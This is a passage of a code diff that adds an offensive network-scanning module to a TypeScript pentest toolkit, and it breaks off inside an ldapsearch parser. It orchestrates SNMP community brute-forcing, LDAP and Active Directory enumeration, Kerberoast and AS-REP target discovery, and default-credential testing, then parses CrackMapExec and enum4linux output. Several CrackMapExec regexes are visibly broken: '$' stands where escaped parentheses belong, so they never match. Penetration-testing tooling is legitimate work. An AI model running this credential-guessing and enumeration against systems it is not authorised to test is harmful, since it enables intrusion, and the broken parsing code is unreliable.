+                subdomain: sub.subdomain,
+                ip: sub.ip,
+              })
+            }
+          }
+        } catch (err) {
+          log.debug("Subdomain enumeration failed", { error: String(err) })
+        }
+      }
+    }
+
+    // SNMP Module
+    if (profile.modules.snmp.enabled) {
+      log.info("Running SNMP module", { target })
+
+      // Community string brute-force
+      if (profile.modules.snmp.communityBrute) {
+        try {
+          const bruteResult = await SNMPCommunity.bruteForce(target, { timeout })
+          if (bruteResult.found.length > 0) {
+            result.snmpResults = bruteResult.found.map((f) => ({
+              host: target,
+              port: 161,
+              community: f.community,
+              version: f.version,
+              sysDescr: f.sysDescr,
+              sysName: f.sysName,
+              interfaces: [],
+              writeAccess: f.writeAccess,
+            }))
+
+            result.findings.push(...bruteResult.findings)
+
+            for (const found of bruteResult.found) {
+              Bus.publish(NetScanEvents.SNMPCommunityFound, {
+                scanID: result.id,
+                host: target,
+                community: found.community,
+                version: found.version,
+                writeAccess: found.writeAccess,
+              })
+
+              if (found.writeAccess) {
+                result.stats.vulnerabilitiesFound++
+              }
+            }
+          }
+        } catch (err) {
+          log.debug("SNMP brute-force failed", { error: String(err) })
+        }
+      }
+
+      // SNMP walk
+      if (profile.modules.snmp.walk && result.snmpResults && result.snmpResults.length > 0) {
+        for (const snmpResult of result.snmpResults) {
+          // SNMPWalk only supports v1 and v2c
+          if (snmpResult.version === "v3") continue
+          try {
+            const walkResult = await SNMPWalk.walk(target, {
+              community: snmpResult.community,
+              version: snmpResult.version,
+              timeout,
+            })
+            if (walkResult.systemInfo) {
+              Object.assign(snmpResult, walkResult.systemInfo)
+            }
+          } catch {
+            // Walk failed
+          }
+        }
+      }
+    }
+
+    // LDAP Module
+    if (profile.modules.ldap.enabled) {
+      log.info("Running LDAP module", { target })
+
+      // Anonymous bind
+      if (profile.modules.ldap.anonBind) {
+        try {
+          const bindResult = await LDAPBind.testAnonymous(target)
+          if (bindResult.anonymousAllowed) {
+            result.findings.push("LDAP anonymous bind allowed")
+            result.findings.push(...bindResult.findings)
+
+            Bus.publish(NetScanEvents.LDAPAnonBindSuccess, {
+              scanID: result.id,
+              host: target,
+              baseDN: bindResult.baseDN || "",
+              objectsEnumerable: 0,
+            })
+          }
+        } catch (err) {
+          log.debug("LDAP anonymous bind test failed", { error: String(err) })
+        }
+      }
+
+      // LDAP enumeration
+      if (profile.modules.ldap.enumeration && options.auth) {
+        try {
+          const baseDN = options.auth.domain
+            ? options.auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+            : ""
+
+          if (baseDN) {
+            const enumResult = await LDAPEnum.enumerate(target, {
+              baseDN,
+              auth: options.auth,
+            })
+
+            result.users = enumResult.users
+            result.findings.push(...enumResult.findings)
+          }
+        } catch (err) {
+          log.debug("LDAP enumeration failed", { error: String(err) })
+        }
+      }
+
+      // Password policy
+      if (profile.modules.ldap.passwordPolicy && options.auth) {
+        try {
+          const baseDN = options.auth.domain
+            ? options.auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+            : ""
+
+          if (baseDN) {
+            const policyResult = await LDAPPolicy.extract(target, {
+              baseDN,
+              auth: options.auth,
+            })
+
+            if (policyResult.domainPolicy) {
+              result.adDomain = {
+                ...result.adDomain,
+                name: options.auth.domain || "",
+                netbios: options.auth.domain?.split(".")[0].toUpperCase() || "",
+                domainSID: "",
+                functionalLevel: "unknown",
+                domainControllers: [target],
+                trusts: [],
+                passwordPolicy: policyResult.domainPolicy,
+              }
+
+              result.findings.push(...policyResult.findings)
+
+              Bus.publish(NetScanEvents.PasswordPolicyFound, {
+                scanID: result.id,
+                domain: options.auth.domain || target,
+                minLength: policyResult.domainPolicy.minLength ?? 0,
+                maxAge: policyResult.domainPolicy.maxAge ?? 0,
+                complexity: policyResult.domainPolicy.complexity ?? false,
+                lockoutThreshold: policyResult.domainPolicy.lockoutThreshold ?? 0,
+              })
+            }
+          }
+        } catch (err) {
+          log.debug("Password policy extraction failed", { error: String(err) })
+        }
+      }
+    }
+
+    // AD Module
+    if (profile.modules.ad.enabled && options.auth?.domain) {
+      log.info("Running AD module", { target })
+
+      const auth = {
+        username: options.auth.username,
+        password: options.auth.password,
+        domain: options.auth.domain,
+      }
+
+      // Domain enumeration
+      if (profile.modules.ad.enumeration) {
+        try {
+          const domainInfo = await ADEnumeration.getDomainInfo(target, auth, { timeout })
+          result.adDomain = domainInfo
+          result.findings.push(`Domain: ${domainInfo.name}`)
+
+          Bus.publish(NetScanEvents.ADDomainFound, {
+            scanID: result.id,
+            domainName: domainInfo.name,
+            netbios: domainInfo.netbios,
+            domainSID: domainInfo.domainSID,
+            functionalLevel: domainInfo.functionalLevel,
+            dcCount: domainInfo.domainControllers.length,
+          })
+        } catch (err) {
+          log.debug("AD domain enumeration failed", { error: String(err) })
+        }
+      }
+
+      // Kerberos attacks
+      if (profile.modules.ad.kerberoast || profile.modules.ad.asrepRoast) {
+        try {
+          const kerbResult = await Kerberos.findTargets({
+            dc: target,
+            domain: options.auth.domain,
+            auth: { username: options.auth.username, password: options.auth.password },
+            timeout,
+          })
+
+          if (kerbResult.kerberoastTargets.length > 0) {
+            result.findings.push(`Found ${kerbResult.kerberoastTargets.length} Kerberoastable accounts`)
+            for (const kt of kerbResult.kerberoastTargets) {
+              Bus.publish(NetScanEvents.KerberoastableFound, {
+                scanID: result.id,
+                domain: options.auth.domain,
+                samAccountName: kt.samAccountName,
+                spnCount: kt.servicePrincipalNames.length,
+                isAdmin: kt.isAdmin,
+              })
+            }
+          }
+
+          if (kerbResult.asrepTargets.length > 0) {
+            result.findings.push(`Found ${kerbResult.asrepTargets.length} AS-REP roastable accounts`)
+            for (const at of kerbResult.asrepTargets) {
+              Bus.publish(NetScanEvents.ASRepRoastableFound, {
+                scanID: result.id,
+                domain: options.auth.domain,
+                samAccountName: at.samAccountName,
+                isAdmin: at.isAdmin,
+              })
+            }
+          }
+        } catch (err) {
+          log.debug("Kerberos attack search failed", { error: String(err) })
+        }
+      }
+
+      // Trust enumeration
+      if (profile.modules.ad.trusts) {
+        try {
+          const trustResult = await DomainTrusts.enumerate({
+            dc: target,
+            domain: options.auth.domain,
+            auth: { username: options.auth.username, password: options.auth.password },
+            timeout,
+          })
+
+          if (result.adDomain) {
+            result.adDomain.trusts = trustResult.trusts
+          }
+
+          result.findings.push(...trustResult.findings)
+
+          for (const trust of trustResult.trusts) {
+            Bus.publish(NetScanEvents.DomainTrustFound, {
+              scanID: result.id,
+              sourceDomain: options.auth.domain,
+              targetDomain: trust.targetDomain,
+              trustType: trust.trustType ?? trust.type ?? "unknown",
+              trustDirection: trust.trustDirection ?? trust.direction ?? "unknown",
+              sidFiltering: trust.sidFiltering ?? false,
+            })
+          }
+        } catch (err) {
+          log.debug("Trust enumeration failed", { error: String(err) })
+        }
+      }
+    }
+
+    // Credential Module
+    if (profile.modules.creds.enabled) {
+      log.info("Running credential module", { target })
+
+      // Default credentials
+      if (profile.modules.creds.defaults) {
+        for (const service of ["smb", "ssh", "ftp"]) {
+          try {
+            const port = service === "smb" ? 445 : service === "ssh" ? 22 : 21
+            const creds = await DefaultCreds.test(target, service, port, { timeout })
+
+            if (creds.length > 0) {
+              if (!result.credentials) result.credentials = []
+              result.credentials.push(...creds)
+              result.stats.credentialsFound += creds.length
+
+              for (const cred of creds) {
+                result.findings.push(`Valid ${service} credential: ${cred.username}`)
+
+                Bus.publish(NetScanEvents.CredentialFound, {
+                  scanID: result.id,
+                  host: target,
+                  service,
+                  port,
+                  username: cred.username,
+                  method: "default",
+                  isAdmin: cred.admin,
+                })
+              }
+            }
+          } catch (err) {
+            log.debug("Default credential test failed", { service, error: String(err) })
+          }
+        }
+      }
+    }
+
+    // Update stats
+    result.stats.hostsScanned = 1
+    result.stats.servicesFound = (result.shares?.length || 0) + (result.snmpResults?.length || 0)
+  }
+
+  /**
+   * Get scan status.
+   */
+  export async function getStatus(
+    scanID: string,
+    storageConfig?: { storage?: "file" | "memory" }
+  ): Promise<NetScanTypes.NetScanResult | null> {
+    return NetScanStorage.getScan(scanID, storageConfig)
+  }
+
+  /**
+   * List all scans.
+   */
+  export async function listScans(
+    storageConfig?: { storage?: "file" | "memory" },
+    filters?: {
+      target?: string
+      profile?: NetScanTypes.ProfileId
+      status?: NetScanTypes.Status
+      limit?: number
+    }
+  ): Promise<NetScanTypes.NetScanResult[]> {
+    return NetScanStorage.listScans(storageConfig, filters)
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/parsers/crackmapexec.ts b/packages/opencode/src/pentest/netscan/parsers/crackmapexec.ts
new file mode 100644
index 00000000000..7c0ead53f31
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/parsers/crackmapexec.ts
@@ -0,0 +1,299 @@
+/**
+ * @fileoverview CrackMapExec Output Parser
+ *
+ * Parses CrackMapExec (CME) output for SMB, LDAP, and WinRM results.
+ *
+ * @module pentest/netscan/parsers/crackmapexec
+ */
+
+import { NetScanTypes } from "../types"
+
+/**
+ * CME output line result.
+ */
+export interface CMELine {
+  protocol: string
+  host: string
+  port: number
+  hostname?: string
+  domain?: string
+  os?: string
+  signing?: boolean
+  smbv1?: boolean
+  message?: string
+  status?: "success" | "failure" | "info"
+  username?: string
+  password?: string
+  hash?: string
+  isAdmin?: boolean
+  share?: string
+  access?: "READ" | "WRITE" | "READ/WRITE"
+}
+
+/**
+ * CME parsed results.
+ */
+export interface CMEResults {
+  hosts: CMELine[]
+  credentials: CMELine[]
+  shares: CMELine[]
+  findings: string[]
+}
+
+/**
+ * CrackMapExec parser namespace.
+ */
+export namespace CrackMapExecParser {
+  /**
+   * Parse CME output.
+   */
+  export function parse(output: string): CMEResults {
+    const lines = output.split("\n").filter((l) => l.trim())
+    const results: CMEResults = {
+      hosts: [],
+      credentials: [],
+      shares: [],
+      findings: [],
+    }
+
+    for (const line of lines) {
+      const parsed = parseLine(line)
+      if (!parsed) continue
+
+      // Categorize based on content
+      if (parsed.username && parsed.status === "success") {
+        results.credentials.push(parsed)
+      } else if (parsed.share) {
+        results.shares.push(parsed)
+      } else {
+        results.hosts.push(parsed)
+      }
+
+      // Extract findings
+      if (parsed.signing === false) {
+        results.findings.push(`SMB Signing not required on ${parsed.host}`)
+      }
+      if (parsed.smbv1) {
+        results.findings.push(`SMBv1 enabled on ${parsed.host} (potential EternalBlue)`)
+      }
+      if (parsed.isAdmin) {
+        results.findings.push(`Admin access confirmed: ${parsed.username}@${parsed.host}`)
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Parse a single CME output line.
+   */
+  export function parseLine(line: string): CMELine | null {
+    // CME format: PROTOCOL HOST:PORT HOSTNAME [MESSAGE]
+    // Example: SMB 192.168.1.10:445 DC01 [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:CORP.LOCAL) (signing:True) (SMBv1:False)
+
+    // Skip non-CME lines
+    if (!line.includes("[*]") && !line.includes("[+]") && !line.includes("[-]")) {
+      return null
+    }
+
+    const result: CMELine = {
+      protocol: "smb",
+      host: "",
+      port: 445,
+    }
+
+    // Determine status from marker
+    if (line.includes("[+]")) {
+      result.status = "success"
+    } else if (line.includes("[-]")) {
+      result.status = "failure"
+    } else {
+      result.status = "info"
+    }
+
+    // Extract protocol
+    const protocolMatch = line.match(/^(SMB|LDAP|WINRM|MSSQL|SSH|FTP|RDP)\s+/i)
+    if (protocolMatch) {
+      result.protocol = protocolMatch[1].toLowerCase()
+    }
+
+    // Extract host:port
+    const hostMatch = line.match(/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})(?::(\d+))?/)
+    if (hostMatch) {
+      result.host = hostMatch[1]
+      result.port = hostMatch[2] ? parseInt(hostMatch[2], 10) : 445
+    }
+
+    // Extract hostname
+    const hostnameMatch = line.match(/$name:([^)]+)$/)
+    if (hostnameMatch) {
+      result.hostname = hostnameMatch[1]
+    }
+
+    // Extract domain
+    const domainMatch = line.match(/$domain:([^)]+)$/)
+    if (domainMatch) {
+      result.domain = domainMatch[1]
+    }
+
+    // Extract OS
+    const osMatch = line.match(/Windows [^(]+/)
+    if (osMatch) {
+      result.os = osMatch[0].trim()
+    }
+
+    // Extract signing status
+    const signingMatch = line.match(/$signing:(True|False)$/i)
+    if (signingMatch) {
+      result.signing = signingMatch[1].toLowerCase() === "true"
+    }
+
+    // Extract SMBv1 status
+    const smbv1Match = line.match(/$SMBv1:(True|False)$/i)
+    if (smbv1Match) {
+      result.smbv1 = smbv1Match[1].toLowerCase() === "true"
+    }
+
+    // Extract credential info
+    const credMatch = line.match(/([^\s]+)\\([^\s:]+):([^\s]+)/)
+    if (credMatch) {
+      result.domain = credMatch[1]
+      result.username = credMatch[2]
+      result.password = credMatch[3]
+    }
+
+    // Check for admin access (Pwn3d!)
+    if (line.includes("Pwn3d!") || line.includes("(Pwn3d!)")) {
+      result.isAdmin = true
+    }
+
+    // Extract share info
+    const shareMatch = line.match(/\s+([\w$]+)\s+(READ|WRITE|READ\/WRITE|NO ACCESS)/i)
+    if (shareMatch) {
+      result.share = shareMatch[1]
+      const accessStr = shareMatch[2].toUpperCase()
+      if (accessStr === "READ" || accessStr === "WRITE" || accessStr === "READ/WRITE") {
+        result.access = accessStr as "READ" | "WRITE" | "READ/WRITE"
+      }
+    }
+
+    // Extract full message
+    const messageMatch = line.match(/\[.\]\s+(.+)$/)
+    if (messageMatch) {
+      result.message = messageMatch[1]
+    }
+
+    return result.host ? result : null
+  }
+
+  /**
+   * Convert CME results to network hosts.
+   */
+  export function toNetworkHosts(results: CMEResults): NetScanTypes.NetworkHost[] {
+    const hostsMap = new Map<string, NetScanTypes.NetworkHost>()
+
+    for (const line of results.hosts) {
+      let host = hostsMap.get(line.host)
+      if (!host) {
+        host = {
+          ip: line.host,
+          hostname: line.hostname,
+          domain: line.domain,
+          os: line.os,
+          services: [],
+          discoveredAt: Date.now(),
+        }
+        hostsMap.set(line.host, host)
+      }
+
+      // Add/update service
+      const existingService = host.services.find((s) => s.port === line.port && s.protocol === "tcp")
+      if (!existingService) {
+        host.services.push({
+          port: line.port,
+          protocol: "tcp",
+          service: (line.protocol || "unknown") as NetScanTypes.ServiceType,
+          authenticated: false,
+          vulnerabilities: [],
+        })
+      }
+
+      // Update host info
+      if (line.hostname && !host.hostname) host.hostname = line.hostname
+      if (line.domain && !host.domain) host.domain = line.domain
+      if (line.os && !host.os) host.os = line.os
+    }
+
+    return Array.from(hostsMap.values())
+  }
+
+  /**
+   * Convert CME results to SMB shares.
+   */
+  export function toSMBShares(results: CMEResults): NetScanTypes.SMBShare[] {
+    const shares: NetScanTypes.SMBShare[] = []
+
+    for (const line of results.shares) {
+      if (!line.share) continue
+
+      shares.push({
+        name: line.share,
+        type: line.share.endsWith("$") ? "admin" : "disk",
+        permissions: {
+          read: line.access === "READ" || line.access === "READ/WRITE",
+          write: line.access === "WRITE" || line.access === "READ/WRITE",
+          anonymous: !line.username,
+        },
+        sensitiveFiles: [],
+      })
+    }
+
+    return shares
+  }
+
+  /**
+   * Convert CME results to credential results.
+   */
+  export function toCredentials(results: CMEResults): NetScanTypes.CredentialResult[] {
+    const creds: NetScanTypes.CredentialResult[] = []
+
+    for (const line of results.credentials) {
+      if (!line.username) continue
+
+      creds.push({
+        id: `cred_cme_${Date.now()}_${Math.random().toString(36).slice(2)}`,
+        host: line.host,
+        service: (line.protocol || "unknown") as NetScanTypes.ServiceType,
+        port: line.port,
+        username: line.username,
+        password: line.password,
+        method: "default",
+        valid: line.status === "success",
+        admin: line.isAdmin || false,
+        timestamp: Date.now(),
+      })
+    }
+
+    return creds
+  }
+
+  /**
+   * Extract SMB signing info from results.
+   */
+  export function extractSigningInfo(
+    results: CMEResults
+  ): Map<string, { required: boolean; enabled: boolean }> {
+    const signingMap = new Map<string, { required: boolean; enabled: boolean }>()
+
+    for (const line of results.hosts) {
+      if (line.signing !== undefined) {
+        signingMap.set(line.host, {
+          required: line.signing,
+          enabled: line.signing,
+        })
+      }
+    }
+
+    return signingMap
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/parsers/enum4linux.ts b/packages/opencode/src/pentest/netscan/parsers/enum4linux.ts
new file mode 100644
index 00000000000..4135e2e0e37
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/parsers/enum4linux.ts
@@ -0,0 +1,451 @@
+/**
+ * @fileoverview Enum4linux Output Parser
+ *
+ * Parses enum4linux-ng output for SMB/RPC enumeration results.
+ *
+ * @module pentest/netscan/parsers/enum4linux
+ */
+
+import { NetScanTypes } from "../types"
+
+/**
+ * Enum4linux parsed results.
+ */
+export interface Enum4linuxResults {
+  host: string
+  domain?: string
+  workgroup?: string
+  osInfo?: string
+  users: Enum4linuxUser[]
+  groups: Enum4linuxGroup[]
+  shares: NetScanTypes.SMBShare[]
+  passwordPolicy?: NetScanTypes.PasswordPolicy
+  nullSessionAllowed: boolean
+  smbVersions: string[]
+  printers: string[]
+  findings: string[]
+}
+
+/**
+ * Enum4linux user info.
+ */
+export interface Enum4linuxUser {
+  rid: number
+  username: string
+  fullName?: string
+  description?: string
+  flags?: string[]
+}
+
+/**
+ * Enum4linux group info.
+ */
+export interface Enum4linuxGroup {
+  rid: number
+  name: string
+  description?: string
+  members?: string[]
+}
+
+/**
+ * Enum4linux parser namespace.
+ */
+export namespace Enum4linuxParser {
+  /**
+   * Parse enum4linux output.
+   */
+  export function parse(output: string): Enum4linuxResults {
+    const results: Enum4linuxResults = {
+      host: "",
+      users: [],
+      groups: [],
+      shares: [],
+      nullSessionAllowed: false,
+      smbVersions: [],
+      printers: [],
+      findings: [],
+    }
+
+    const lines = output.split("\n")
+
+    for (let i = 0; i < lines.length; i++) {
+      const line = lines[i]
+
+      // Extract target host
+      const targetMatch = line.match(/Target\s+:\s+(\S+)/)
+      if (targetMatch) {
+        results.host = targetMatch[1]
+      }
+
+      // Extract workgroup/domain
+      const workgroupMatch = line.match(/(?:Workgroup|Domain)\s*:\s*(\S+)/)
+      if (workgroupMatch) {
+        results.workgroup = workgroupMatch[1]
+      }
+
+      // Extract domain from more specific patterns
+      const domainMatch = line.match(/Domain\s+Name\s*:\s*(\S+)/i)
+      if (domainMatch) {
+        results.domain = domainMatch[1]
+      }
+
+      // Extract OS info
+      const osMatch = line.match(/OS\s+:\s+(.+)/)
+      if (osMatch) {
+        results.osInfo = osMatch[1].trim()
+      }
+
+      // Check for null session
+      if (
+        line.includes("null session") ||
+        line.includes("Null Session") ||
+        line.includes("anonymous access")
+      ) {
+        if (line.includes("allowed") || line.includes("success") || !line.includes("denied")) {
+          results.nullSessionAllowed = true
+          results.findings.push("Null session access is allowed")
+        }
+      }
+
+      // Parse users section
+      if (line.includes("Users via RID cycling") || line.includes("Users enumerated")) {
+        const users = parseUsersSection(lines, i + 1)
+        results.users.push(...users)
+        if (users.length > 0) {
+          results.findings.push(`Enumerated ${users.length} users via RID cycling`)
+        }
+      }
+
+      // Parse user line directly
+      const userMatch = line.match(
+        /(?:user:\[([^\]]+)\]|S-1-5-\d+-\d+-\d+-\d+-(\d+)\s+(\S+))/
+      )
+      if (userMatch) {
+        const username = userMatch[1] || userMatch[3]
+        const rid = userMatch[2] ? parseInt(userMatch[2], 10) : 0
+        if (username && !results.users.find((u) => u.username === username)) {
+          results.users.push({ rid, username })
+        }
+      }
+
+      // Parse groups section
+      if (line.includes("Groups via RID cycling") || line.includes("Groups enumerated")) {
+        const groups = parseGroupsSection(lines, i + 1)
+        results.groups.push(...groups)
+      }
+
+      // Parse group line directly
+      const groupMatch = line.match(/group:\[([^\]]+)\]/)
+      if (groupMatch) {
+        const groupName = groupMatch[1]
+        if (!results.groups.find((g) => g.name === groupName)) {
+          results.groups.push({ rid: 0, name: groupName })
+        }
+      }
+
+      // Parse shares section
+      if (line.includes("Sharename") || line.includes("Shares enumerated")) {
+        const shares = parseSharesSection(lines, i + 1)
+        results.shares.push(...shares)
+      }
+
+      // Parse share line directly
+      const shareMatch = line.match(/^\s*([\w$]+)\s+(Disk|IPC|Printer)\s+(.*)/)
+      if (shareMatch) {
+        const shareName = shareMatch[1]
+        if (!results.shares.find((s) => s.name === shareName)) {
+          results.shares.push({
+            name: shareName,
+            type: shareMatch[2].toLowerCase() === "disk" ? "disk" : shareMatch[2].toLowerCase() === "printer" ? "printer" : "ipc",
+            permissions: { read: false, write: false, anonymous: results.nullSessionAllowed },
+            sensitiveFiles: [],
+          })
+        }
+      }
+
+      // Parse password policy
+      if (line.includes("Password Info") || line.includes("Password Policy")) {
+        results.passwordPolicy = parsePasswordPolicy(lines, i + 1)
+        if (results.passwordPolicy) {
+          const minLen = results.passwordPolicy.minLength ?? 0
+          if (minLen < 8) {
+            results.findings.push(
+              `Weak password policy: minimum length is ${minLen}`
+            )
+          }
+          if (!results.passwordPolicy.complexity) {
+            results.findings.push("Password complexity is not required")
+          }
+        }
+      }
+
+      // Parse SMB versions
+      const smbVersionMatch = line.match(/SMBv?(\d+(?:\.\d+)?)/gi)
+      if (smbVersionMatch) {
+        for (const v of smbVersionMatch) {
+          if (!results.smbVersions.includes(v)) {
+            results.smbVersions.push(v)
+          }
+        }
+      }
+
+      // Parse printers
+      const printerMatch = line.match(/printer:\[([^\]]+)\]/)
+      if (printerMatch) {
+        results.printers.push(printerMatch[1])
+      }
+    }
+
+    // Add SMBv1 finding if present
+    if (results.smbVersions.some((v) => v.includes("1"))) {
+      results.findings.push("SMBv1 is enabled (vulnerable to EternalBlue)")
+    }
+
+    return results
+  }
+
+  /**
+   * Parse users section from output.
+   */
+  function parseUsersSection(lines: string[], startIndex: number): Enum4linuxUser[] {
+    const users: Enum4linuxUser[] = []
+    const seen = new Set<string>()
+
+    for (let i = startIndex; i < Math.min(startIndex + 100, lines.length); i++) {
+      const line = lines[i]
+
+      // Stop at next section
+      if (
+        line.match(/^={3,}/) ||
+        line.match(/^\s*\[.\]/) ||
+        line.includes("enumerated") ||
+        line.includes("Groups")
+      ) {
+        break
+      }
+
+      // Parse user line: user:[username] rid:[1000]
+      const match = line.match(
+        /user:\[([^\]]+)\](?:\s+rid:\[(\d+)\])?|S-1-5-\d+-\d+-\d+-\d+-(\d+)\s+(\S+)/
+      )
+      if (match) {
+        const username = match[1] || match[4]
+        const rid = parseInt(match[2] || match[3] || "0", 10)
+
+        if (username && !seen.has(username.toLowerCase())) {
+          seen.add(username.toLowerCase())
+          users.push({ rid, username })
+        }
+      }
+    }
+
+    return users
+  }
+
+  /**
+   * Parse groups section from output.
+   */
+  function parseGroupsSection(lines: string[], startIndex: number): Enum4linuxGroup[] {
+    const groups: Enum4linuxGroup[] = []
+    const seen = new Set<string>()
+
+    for (let i = startIndex; i < Math.min(startIndex + 100, lines.length); i++) {
+      const line = lines[i]
+
+      // Stop at next section
+      if (
+        line.match(/^={3,}/) ||
+        line.match(/^\s*\[.\]/) ||
+        line.includes("enumerated")
+      ) {
+        break
+      }
+
+      // Parse group line
+      const match = line.match(/group:\[([^\]]+)\](?:\s+rid:\[(\d+)\])?/)
+      if (match) {
+        const name = match[1]
+        const rid = parseInt(match[2] || "0", 10)
+
+        if (name && !seen.has(name.toLowerCase())) {
+          seen.add(name.toLowerCase())
+          groups.push({ rid, name })
+        }
+      }
+    }
+
+    return groups
+  }
+
+  /**
+   * Parse shares section from output.
+   */
+  function parseSharesSection(lines: string[], startIndex: number): NetScanTypes.SMBShare[] {
+    const shares: NetScanTypes.SMBShare[] = []
+    const seen = new Set<string>()
+
+    for (let i = startIndex; i < Math.min(startIndex + 50, lines.length); i++) {
+      const line = lines[i]
+
+      // Stop at next section
+      if (line.match(/^={3,}/) || line.match(/^\s*\[.\]/) || line.includes("enumerated")) {
+        break
+      }
+
+      // Parse share line
+      const match = line.match(/^\s*([\w$]+)\s+(Disk|IPC|Printer)\s*(.*)/)
+      if (match) {
+        const name = match[1]
+        const typeStr = match[2].toLowerCase()
+        const comment = match[3]?.trim()
+
+        if (name && !seen.has(name.toLowerCase())) {
+          seen.add(name.toLowerCase())
+
+          let type: "disk" | "printer" | "ipc" | "admin" = "disk"
+          if (typeStr === "printer") type = "printer"
+          else if (typeStr === "ipc") type = "ipc"
+          else if (name.endsWith("$")) type = "admin"
+
+          shares.push({
+            name,
+            type,
+            path: comment,
+            permissions: { read: false, write: false, anonymous: false },
+            sensitiveFiles: [],
+          })
+        }
+      }
+    }
+
+    return shares
+  }
+
+  /**
+   * Parse password policy from output.
+   */
+  function parsePasswordPolicy(
+    lines: string[],
+    startIndex: number
+  ): NetScanTypes.PasswordPolicy | undefined {
+    const policy: Partial<NetScanTypes.PasswordPolicy> = {}
+
+    for (let i = startIndex; i < Math.min(startIndex + 30, lines.length); i++) {
+      const line = lines[i]
+
+      // Stop at next section
+      if (line.match(/^={3,}/) || line.match(/^\s*\[.\]/)) {
+        break
+      }
+
+      // Parse policy values
+      const minLengthMatch = line.match(/[Mm]in(?:imum)?\s+[Pp]assword\s+[Ll]ength\s*:\s*(\d+)/)
+      if (minLengthMatch) {
+        policy.minLength = parseInt(minLengthMatch[1], 10)
+      }
+
+      const maxAgeMatch = line.match(/[Mm]ax(?:imum)?\s+[Pp]assword\s+[Aa]ge\s*:\s*(\d+)/)
+      if (maxAgeMatch) {
+        policy.maxAge = parseInt(maxAgeMatch[1], 10)
+      }
+
+      const minAgeMatch = line.match(/[Mm]in(?:imum)?\s+[Pp]assword\s+[Aa]ge\s*:\s*(\d+)/)
+      if (minAgeMatch) {
+        policy.minAge = parseInt(minAgeMatch[1], 10)
+      }
+
+      const historyMatch = line.match(/[Pp]assword\s+[Hh]istory\s+[Ll]ength\s*:\s*(\d+)/)
+      if (historyMatch) {
+        policy.historyLength = parseInt(historyMatch[1], 10)
+      }
+
+      const lockoutMatch = line.match(/[Aa]ccount\s+[Ll]ockout\s+[Tt]hreshold\s*:\s*(\d+)/)
+      if (lockoutMatch) {
+        policy.lockoutThreshold = parseInt(lockoutMatch[1], 10)
+      }
+
+      const lockoutDurationMatch = line.match(
+        /[Ll]ockout\s+[Dd]uration\s*:\s*(\d+)/
+      )
+      if (lockoutDurationMatch) {
+        policy.lockoutDuration = parseInt(lockoutDurationMatch[1], 10)
+      }
+
+      const complexityMatch = line.match(/[Cc]omplexity\s*:\s*(True|False|Yes|No|Enabled|Disabled)/i)
+      if (complexityMatch) {
+        policy.complexity = ["true", "yes", "enabled"].includes(
+          complexityMatch[1].toLowerCase()
+        )
+      }
+    }
+
+    if (Object.keys(policy).length > 0) {
+      return {
+        minLength: policy.minLength || 0,
+        maxAge: policy.maxAge || 0,
+        minAge: policy.minAge || 0,
+        historyLength: policy.historyLength || 0,
+        complexity: policy.complexity || false,
+        lockoutThreshold: policy.lockoutThreshold || 0,
+        lockoutDuration: policy.lockoutDuration || 0,
+        lockoutObservationWindow: 0,
+      }
+    }
+
+    return undefined
+  }
+
+  /**
+   * Convert enum4linux results to AD users.
+   */
+  export function toADUsers(results: Enum4linuxResults): NetScanTypes.ADUser[] {
+    return results.users.map((u) => ({
+      samAccountName: u.username,
+      distinguishedName: `CN=${u.username},CN=Users,DC=${results.domain?.split(".").join(",DC=") || "unknown"}`,
+      displayName: u.fullName || u.username,
+      memberOf: [],
+      enabled: true,
+      adminCount: false,
+      servicePrincipalNames: [],
+      dontRequirePreauth: false,
+      passwordNeverExpires: false,
+      passwordNotRequired: false,
+      delegationEnabled: false,
+      trustedForDelegation: false,
+    }))
+  }
+
+  /**
+   * Convert enum4linux results to AD groups.
+   */
+  export function toADGroups(results: Enum4linuxResults): NetScanTypes.ADGroup[] {
+    return results.groups.map((g) => ({
+      samAccountName: g.name,
+      distinguishedName: `CN=${g.name},CN=Groups,DC=${results.domain?.split(".").join(",DC=") || "unknown"}`,
+      description: g.description || "",
+      members: g.members || [],
+      memberOf: [],
+      isPrivileged: isPrivilegedGroup(g.name),
+      adminCount: false,
+    }))
+  }
+
+  /**
+   * Check if a group name indicates privileged access.
+   */
+  function isPrivilegedGroup(name: string): boolean {
+    const privileged = [
+      "domain admins",
+      "enterprise admins",
+      "schema admins",
+      "administrators",
+      "account operators",
+      "server operators",
+      "backup operators",
+      "print operators",
+      "dnsadmins",
+      "group policy creator owners",
+    ]
+    return privileged.includes(name.toLowerCase())
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/parsers/index.ts b/packages/opencode/src/pentest/netscan/parsers/index.ts
new file mode 100644
index 00000000000..0094f3f6a75
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/parsers/index.ts
@@ -0,0 +1,16 @@
+/**
+ * @fileoverview Network Scanner Parsers
+ *
+ * Export all external tool output parsers.
+ *
+ * @module pentest/netscan/parsers
+ */
+
+export { CrackMapExecParser } from "./crackmapexec"
+export type { CMELine, CMEResults } from "./crackmapexec"
+
+export { Enum4linuxParser } from "./enum4linux"
+export type { Enum4linuxResults, Enum4linuxUser, Enum4linuxGroup } from "./enum4linux"
+
+export { LdapsearchParser } from "./ldapsearch"
+export type { LDAPEntry, LdapsearchResults } from "./ldapsearch"
diff --git a/packages/opencode/src/pentest/netscan/parsers/ldapsearch.ts b/packages/opencode/src/pentest/netscan/parsers/ldapsearch.ts
new file mode 100644
index 00000000000..136b808c3d6
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/parsers/ldapsearch.ts
@@ -0,0 +1,418 @@
+/**
+ * @fileoverview ldapsearch Output Parser
+ *
+ * Parses ldapsearch command output for LDAP enumeration results.
+ *
+ * @module pentest/netscan/parsers/ldapsearch
+ */
+
+import { NetScanTypes } from "../types"
+
+/**
+ * LDAP entry from ldapsearch output.
+ */
+export interface LDAPEntry {
+  dn: string
+  objectClass: string[]
+  attributes: Record<string, string[]>
+}
+
+/**
+ * ldapsearch parsed results.
+ */
+export interface LdapsearchResults {
+  entries: LDAPEntry[]
+  users: NetScanTypes.ADUser[]
+  groups: NetScanTypes.ADGroup[]
